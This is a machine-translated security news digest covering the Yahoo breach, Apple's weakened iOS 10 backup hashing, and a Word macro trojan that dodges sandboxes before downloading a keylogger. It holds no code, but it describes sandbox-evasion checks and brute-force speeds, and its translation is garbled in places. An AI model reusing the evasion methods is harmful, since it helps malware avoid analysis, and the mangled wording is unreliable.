Security Week 39: hacking Yahoo, iOS 10 brute force backups, macromavie hiding from researchers
What happened to Yahoo? As he likes to write the British edition of The Register , Yahoo! on! last! a week! stolen! half a billion! passwords! ( news ! official! statement! Yahoo! ) In the previous series, I briefly mentioned this event, considering it to be large-scale, but not so significant as to further spread my thoughts on the tree. But no. And the point is not that they have stolen a lot of passwords: presumably hacking the infrastructure of Yahoo! happened (here, again) in 2014, and now the bases have been on sale in Darqube. Compared to other hacks, the quantitative characteristics of the hack are impressive, but they have long been aware that password protection is an outdated and ineffective tool .It’s interesting how Yahoo and others reacted to this incident. During the discussion of hacking, many interesting details were revealed, the researchers paid attention to the current state of the infrastructure, visible from the outside, and admitted that everything is not as good as we would like (this week's news ). In the leaked database, in addition to passwords, telephone numbers and other personal information were stored, and some of the passwords were hashed by the recognized unreliable MD5 algorithm.
But the most interesting thing in this story is the consequences of a cyber incident for a large and public company. Fair reproaches have arisen that Yahoo itself could have been aware of the incident, and hid this information (the latter could have happened for a million good reasons). The day before yesterday, the New York Times, citing anonymous insiders, reported that the company was simply saving money on security tools, including hacking detection systems.
List of previous episodes here .
So much so that the leakage of passwords is discussed in the US Congress, especially in the most Yahoo suggest that the attack was sponsored by the state. A number of experts, however, this assumption is convincingly disputed - the nature of the attack resembles similar hacks of LinkedIn and MySpace, in the discussion of which the policies were much less.
')
Be that as it may, the story of Yahoo becomes significant in terms of cyber incident response methods. Hacks happen sooner or later, and it is obvious that we need strategies and tools for their detection and neutralization. The faster, the better - there will be less cost. But it's not only that. Some social protocol for disclosing information about hacking is also not worked out, and in fact it would be nice. Judging by the accumulated experience, the maximum openness in terms of the details of hacking (a good example can be found here ) and the steps to solve the problem are perceived most positively by all those involved, including possible victims.
And further. If the situation described in the New York Times did take place, it turns out that Yahoo’s management did not only save on investments in security. Decisions were made in which priority was given not to protection, but to the convenience of users, issues of maintaining the client base and the like. The budget is a tricky business, there is never a lot of money, but the strategy “they all leave us if we reset passwords on every suspicion of hacking” is certainly doomed to inevitable failure. By the way, I'm going to change the password.
Apple has reduced the resilience of backups to brute force in iOS 10. No one knows why
News Elcomsoft blog article .
For unknown reasons, Apple has reduced the security of backups for the recently released version of iOS 10. This is a backup copy of all data from the iPhone or iPad, which is stored on the user's computer via iTunes. Backups have been encrypted for quite some time, and in this case, the strength of encryption is beyond doubt. Doubts are caused by the stability of backups to brute force. The dispute between Apple and the FBI at the beginning of this year made it clear that hacking the iPhone itself, if it is protected by the standard means of the system, is quite difficult. Backup is an obvious vulnerable link: it is stored on a computer, which in most cases is easier to hack than the phone itself (even if it is a Mac), and, unlike a phone, does not self-destruct when you try to disassemble it using illegal methods. And the data is stored there absolutely everything, including passwords from the KeyChain storage system.
So, according to Oleg Afonin, a Elcomsoft company specialist, the problem lies in linking iOS 10 backups to the SHA-256 password hashing algorithm with a single iteration. In iOS 9, PBKDF2 SHA-1, a more robust PBKDF2 algorithm, was used with 10,000 iterations. Elcomsoft specializes in software development to bypass the protection of various devices and software, and, according to their data, changing the algorithm allows you to drastically increase the speed of searching passwords: from 150 thousand to 6 million per second. As a result, it is theoretically possible to hack a backup in two days with an 80-90% probability, and this is if the password is set a bit complicated. If it is very simple - and even faster. The experts did not come up with any other explanation for such an “upgrade” except for a mistake. What, in general, Apple itself acknowledged, promising to return the stability in the future.
Captain Researcher reports on a macrotroyan trying to hide from analysis
News
The most popular news on Threatpost for the week is about a malicious program spreading through infected Word documents, which uses basic methods to hide its real purpose. A researcher from SentinelOne (an article in their blog ) describes a fairly standard situation: a user receives an email with an attachment, an office document opens, a suggestion appears to enable macros, the user (of course) says yes or, depending on the locale, “I do ". Then begins a little more interesting.
First, the launched malicious code tries to punch through the external service the IP of the machine on which it is running, as well as the name of the organization with which the IP is associated. If the name coincides with the data from the inside list (in which basically the names of the manufacturers of the protective software, and the “Laboratories” are not there), then nothing happens. Nothing happens even if a quick search through the system does not produce a single office document - obviously, this is how the launch of malicious code is checked on a virtual or just on a test system. If all checks are successful, the keylogger is downloaded and launched by a script in Powershell.
These are interesting details of modern Malvari
In fact, such techniques are unlikely to confuse an experienced or simply persistent researcher. More interesting examples of hiding the true purpose of the code can be found in the stories about Lurk . Sooner or later, the secret becomes clear. It is much more important to identify and block the mimicking malware by automated means. It uses a lot of very original solutions, which, alas, usually remain non-public (here, for example, one exception ) - both because of deep technical specifics and because of the unwillingness to share with cybercriminals methods of detecting malware with increased cunning.
Antiquities
"Typo-867"
Nonresident dangerous virus. Standard affects .COM files. After the work of the infected file is completed, it leaves in memory a small resident program that replaces some characters entered from the keyboard. At the time the infected file is running, interrupts are set to 16h, 20h, 21h.
Quote from the book "Computer viruses in MS-DOS" Eugene Kaspersky. 1992 Page 86.
Disclaimer: This column reflects only the personal opinion of its author. It may coincide with the position of Kaspersky Lab, or it may not coincide. Then how lucky.
Source: https://habr.com/ru/post/311438/
All Articles